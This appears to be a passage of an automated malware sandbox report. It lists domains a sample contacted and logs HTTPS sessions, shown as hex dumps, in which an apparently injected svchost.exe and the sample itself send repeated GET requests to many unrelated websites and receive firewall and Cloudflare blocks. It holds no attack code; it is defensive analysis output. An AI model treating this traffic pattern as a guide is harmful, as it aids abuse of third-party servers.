                                                                                                                                                                                                                                                                        • kustnara.com
                                                                                                                                                                                                                                                                        • htsmx.net
                                                                                                                                                                                                                                                                        • kevyt.net
                                                                                                                                                                                                                                                                        • kairel.com
                                                                                                                                                                                                                                                                        • reproar.com
                                                                                                                                                                                                                                                                        • scintel.com
                                                                                                                                                                                                                                                                        • oh28ya.com
                                                                                                                                                                                                                                                                        • cutchie.com
                                                                                                                                                                                                                                                                        • kamptal.at
                                                                                                                                                                                                                                                                        • cpmteam.com
                                                                                                                                                                                                                                                                        • paraski.org
                                                                                                                                                                                                                                                                        • vonparis.com
                                                                                                                                                                                                                                                                        • arowines.com
                                                                                                                                                                                                                                                                        • semuk.com
                                                                                                                                                                                                                                                                        • coxkitchensandbaths.com
                                                                                                                                                                                                                                                                        • bosado.com
                                                                                                                                                                                                                                                                        • missnue.com
                                                                                                                                                                                                                                                                        • shanks.co.uk
                                                                                                                                                                                                                                                                        • redgiga.com
                                                                                                                                                                                                                                                                        • fundeo.com
                                                                                                                                                                                                                                                                        • stopllc.com
                                                                                                                                                                                                                                                                        • themark.org
                                                                                                                                                                                                                                                                        • tabbles.net
                                                                                                                                                                                                                                                                        • onzcda.com
                                                                                                                                                                                                                                                                        • unicus.jp
                                                                                                                                                                                                                                                                        • dzm.cz
                                                                                                                                                                                                                                                                        • orbitgas.com
                                                                                                                                                                                                                                                                        • captlfix.com
                                                                                                                                                                                                                                                                        • skgm.ru
                                                                                                                                                                                                                                                                        • epc.com.au
                                                                                                                                                                                                                                                                        • plaske.ua
                                                                                                                                                                                                                                                                        • cbaben.com
                                                                                                                                                                                                                                                                        • ftmobile.com
                                                                                                                                                                                                                                                                        • kursavto.ru
                                                                                                                                                                                                                                                                        • aba.org.eg
                                                                                                                                                                                                                                                                        • keio-web.com
                                                                                                                                                                                                                                                                        • amerifor.com
                                                                                                                                                                                                                                                                        • indonesiamedia.com
                                                                                                                                                                                                                                                                        • ssm.ch
                                                                                                                                                                                                                                                                        • vivastay.com
                                                                                                                                                                                                                                                                        • hazmatt.com
                                                                                                                                                                                                                                                                        • wvs-net.de
                                                                                                                                                                                                                                                                        • rappich.de
                                                                                                                                                                                                                                                                        • from30ty.com
                                                                                                                                                                                                                                                                        • tbvlugus.nl
                                                                                                                                                                                                                                                                        • riwn.org
                                                                                                                                                                                                                                                                        • johnlyon.org
                                                                                                                                                                                                                                                                        • camamat.com
                                                                                                                                                                                                                                                                        • magicomm.co.uk
                                                                                                                                                                                                                                                                        • impexnc.com
                                                                                                                                                                                                                                                                        • any-s.net
                                                                                                                                                                                                                                                                        • fdlymca.org
                                                                                                                                                                                                                                                                        • t-trust.jp
                                                                                                                                                                                                                                                                        • infotech.pl
                                                                                                                                                                                                                                                                        • tcpoa.com
                                                                                                                                                                                                                                                                        • revoldia.net
                                                                                                                                                                                                                                                                        • dayvo.com
                                                                                                                                                                                                                                                                        • pertex.com
                                                                                                                                                                                                                                                                        • web-york.com
                                                                                                                                                                                                                                                                        • pellys.co.uk
                                                                                                                                                                                                                                                                        • popbook.com
                                                                                                                                                                                                                                                                        • pccj.net
                                                                                                                                                                                                                                                                        • aiolos-sa.gr
                                                                                                                                                                                                                                                                        • envogen.com
                                                                                                                                                                                                                                                                        • webways.com
                                                                                                                                                                                                                                                                        • bossinst.com
                                                                                                                                                                                                                                                                        • akdeniz.nl
                                                                                                                                                                                                                                                                        • softizer.com
                                                                                                                                                                                                                                                                        • host.do
                                                                                                                                                                                                                                                                        • vfcindia.com
                                                                                                                                                                                                                                                                        • hes.pt
                                                                                                                                                                                                                                                                        • juso-gr.ch
                                                                                                                                                                                                                                                                        • yasuma.com
                                                                                                                                                                                                                                                                        • sokuwan.net
                                                                                                                                                                                                                                                                        • lpver.com
                                                                                                                                                                                                                                                                        • likangds.com
                                                                                                                                                                                                                                                                        • rtcasey.com
                                                                                                                                                                                                                                                                        • umcor.am
                                                                                                                                                                                                                                                                        • linac.co.uk
                                                                                                                                                                                                                                                                        • calvinly.com
                                                                                                                                                                                                                                                                        • smitko.net
                                                                                                                                                                                                                                                                        • enguita.net
                                                                                                                                                                                                                                                                        • mackusick.com
                                                                                                                                                                                                                                                                        • dspears.com
                                                                                                                                                                                                                                                                        • apcotex.com
                                                                                                                                                                                                                                                                        • roewer.de
                                                                                                                                                                                                                                                                        • bible.org
                                                                                                                                                                                                                                                                        • nettle.pl
                                                                                                                                                                                                                                                                        • bidroll.com
                                                                                                                                                                                                                                                                        • yoruksut.com
                                                                                                                                                                                                                                                                        • dhh.la.gov
                                                                                                                                                                                                                                                                        • com-edit.fr
                                                                                                                                                                                                                                                                        • 78san.com
                                                                                                                                                                                                                                                                        • noblesse.be
                                                                                                                                                                                                                                                                        • avse.hu
                                                                                                                                                                                                                                                                        • duiops.net
                                                                                                                                                                                                                                                                        • iranytu.net
                                                                                                                                                                                                                                                                        • touchfam.ca
                                                                                                                                                                                                                                                                        • ludomemo.com
                                                                                                                                                                                                                                                                        • okashimo.com
                                                                                                                                                                                                                                                                        • bd-style.com
                                                                                                                                                                                                                                                                        • beafin.com
                                                                                                                                                                                                                                                                        • wantapc.net
                                                                                                                                                                                                                                                                        • daytonir.com
                                                                                                                                                                                                                                                                        • notis.ru
                                                                                                                                                                                                                                                                        • cjborden.com
                                                                                                                                                                                                                                                                        • shteeble.com
                                                                                                                                                                                                                                                                        • xult.org
                                                                                                                                                                                                                                                                        • karmy.com.pl
                                                                                                                                                                                                                                                                        • snf.it
                                                                                                                                                                                                                                                                        • hchc.org
                                                                                                                                                                                                                                                                        • a-domani.com
                                                                                                                                                                                                                                                                        • shztm.ru
                                                                                                                                                                                                                                                                        • hbfuels.com
                                                                                                                                                                                                                                                                        • webavant.com
                                                                                                                                                                                                                                                                        • ifesnet.com
                                                                                                                                                                                                                                                                        • lyto.net
                                                                                                                                                                                                                                                                        • oozkranj.com
                                                                                                                                                                                                                                                                        • atb-lit.com
                                                                                                                                                                                                                                                                        • portoccd.org
                                                                                                                                                                                                                                                                        • floopis.com
                                                                                                                                                                                                                                                                        • tozzhin.com
                                                                                                                                                                                                                                                                        • banvari.com
                                                                                                                                                                                                                                                                        • araax.com
                                                                                                                                                                                                                                                                        • hubbikes.com
                                                                                                                                                                                                                                                                        • mijash3.com
                                                                                                                                                                                                                                                                        • ncn.de
                                                                                                                                                                                                                                                                        • rokoron.com
                                                                                                                                                                                                                                                                        • kewlmail.com
                                                                                                                                                                                                                                                                        • shiner.com
                                                                                                                                                                                                                                                                        • x96.com
                                                                                                                                                                                                                                                                        • siongann.com
                                                                                                                                                                                                                                                                        • aoinko.net
                                                                                                                                                                                                                                                                        • zemarmot.net
                                                                                                                                                                                                                                                                        • gbp-jp.com
                                                                                                                                                                                                                                                                        • kumaden.com
                                                                                                                                                                                                                                                                        • jnf.at
                                                                                                                                                                                                                                                                        • midap.com
                                                                                                                                                                                                                                                                        • dyag-eng.com
                                                                                                                                                                                                                                                                        • komie.com
                                                                                                                                                                                                                                                                        • agulatex.com
                                                                                                                                                                                                                                                                        • sidepath.com
                                                                                                                                                                                                                                                                        • rkengg.com
                                                                                                                                                                                                                                                                        • eos-i.com
                                                                                                                                                                                                                                                                        • forbin.net
                                                                                                                                                                                                                                                                        • valselit.com
                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        0192.168.2.650310185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC1INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:55:59 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC1INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        1192.168.2.650353138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:55:59 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:55:59 UTC1INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        10192.168.2.650893188.114.97.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC149OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC150INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:14 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gTK1qps7P0cbbwJ4lykjwpor2OZM3w9hNehKfVwNkiMCIkzFs33tDPr%2BKwB3VDRiNjmJohPoa%2BfzE2LkycvRpMrLuqkyZHMD1DIwSLd8zSHXbb%2BkWnFeFHpsDGD4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8178ae75b9e-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC151INData Raw: 31 65 62 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ebc<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC151INData Raw: 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: th,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC153INData Raw: 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 6d 53 68 6a 49 79 45 6b 79 67 65 34 63 32 71 73 69 75 44 7a 31 4d 6b 65 6d 31 65 41 70 36 43 77 4e 43 37 37 75 65 56 56 53 44 55 2d 31 36 37 38 34 33 31 33 37 34 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 4f 56 65 66 4c 43 6d 78 39 70 4c 71 73 69 51 76 65 46 75 52 72 46 75 35 30 35 62 32 5a 5a 37 44 30 61 67 4e 4f 39 68 32 62 63 49 2d 31 36 37 38 34 33 31 33 37 34 2d 30 2d
                                                                                                                                                                                                                                                                        Data Ascii: n="/?__cf_chl_f_tk=mShjIyEkyge4c2qsiuDz1Mkem1eAp6CwNC77ueVVSDU-1678431374-0-gaNycGzNCRA" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="OVefLCmx9pLqsiQveFuRrFu505b2ZZ7D0agNO9h2bcI-1678431374-0-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC154INData Raw: 2d 70 5a 63 77 6b 66 44 53 67 76 77 49 4d 66 66 31 57 6b 63 5a 42 5f 4d 77 72 6f 69 73 4b 47 75 2d 73 63 58 77 36 6f 73 36 61 50 4b 6c 33 37 54 45 42 4e 42 6b 61 48 75 76 77 37 79 32 2d 7a 59 69 41 4d 6c 4f 70 35 41 75 67 71 53 4d 36 71 71 77 51 5f 41 59 6e 43 63 6e 44 74 41 66 68 39 62 38 67 47 65 55 41 6f 74 5f 6f 35 57 53 51 77 35 4a 63 35 50 2d 4b 50 4e 4e 73 4f 36 41 76 75 4a 43 70 4d 65 56 58 49 63 74 31 4e 68 69 49 56 62 4c 6f 4b 72 71 35 72 41 31 75 58 68 59 6c 54 65 48 7a 61 48 35 79 69 50 52 5f 59 70 65 4d 62 79 4b 4f 44 76 50 39 6d 37 67 43 35 39 64 6d 47 71 79 53 4a 6f 6a 71 34 49 5f 73 37 5a 72 50 48 6b 57 5f 48 34 58 33 76 51 45 51 6a 54 72 38 50 76 62 53 30 62 46 54 4a 38 49 6e 44 55 59 76 77 68 75 6b 32 65 49 45 50 76 79 45 6d 77 50 4a 74
                                                                                                                                                                                                                                                                        Data Ascii: -pZcwkfDSgvwIMff1WkcZB_MwroisKGu-scXw6os6aPKl37TEBNBkaHuvw7y2-zYiAMlOp5AugqSM6qqwQ_AYnCcnDtAfh9b8gGeUAot_o5WSQw5Jc5P-KPNNsO6AvuJCpMeVXIct1NhiIVbLoKrq5rA1uXhYlTeHzaH5yiPR_YpeMbyKODvP9m7gC59dmGqySJojq4I_s7ZrPHkW_H4X3vQEQjTr8PvbS0bFTJ8InDUYvwhuk2eIEPvyEmwPJt
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC155INData Raw: 63 52 61 79 3a 20 27 37 61 35 39 61 38 31 37 38 61 65 37 35 62 39 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 39 63 38 61 61 36 63 64 39 39 36 32 39 33 65 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6d 53 68 6a 49 79 45 6b 79 67 65 34 63 32 71 73 69 75 44 7a 31 4d 6b 65 6d 31 65 41 70 36 43 77 4e 43 37 37 75 65 56 56 53 44 55 2d 31 36 37 38 34 33 31 33 37 34 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 52 41 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20
                                                                                                                                                                                                                                                                        Data Ascii: cRay: '7a59a8178ae75b9e', cHash: '9c8aa6cd996293e', cUPMDTk: "\/?__cf_chl_tk=mShjIyEkyge4c2qsiuDz1Mkem1eAp6CwNC77ueVVSDU-1678431374-0-gaNycGzNCRA", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC157INData Raw: 54 49 61 77 71 6e 35 74 56 37 6e 6d 70 77 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 71 65 36 69 45 2b 55 38 52 35 44 63 31 62 4d 30 51 34 34 62 4c 67 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37
                                                                                                                                                                                                                                                                        Data Ascii: TIawqn5tV7nmpw==', i2: 'qe6iE+U8R5Dc1bM0Q44bLg==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC158INData Raw: 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69
                                                                                                                                                                                                                                                                        Data Ascii: OgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contenti
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC159INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        100192.168.2.658452185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1587OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1588INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:21 GMT
                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        2023-03-10 06:56:21 UTC1588INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                        Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        101192.168.2.65825449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:22 UTC1589OUTGET / HTTP/1.1
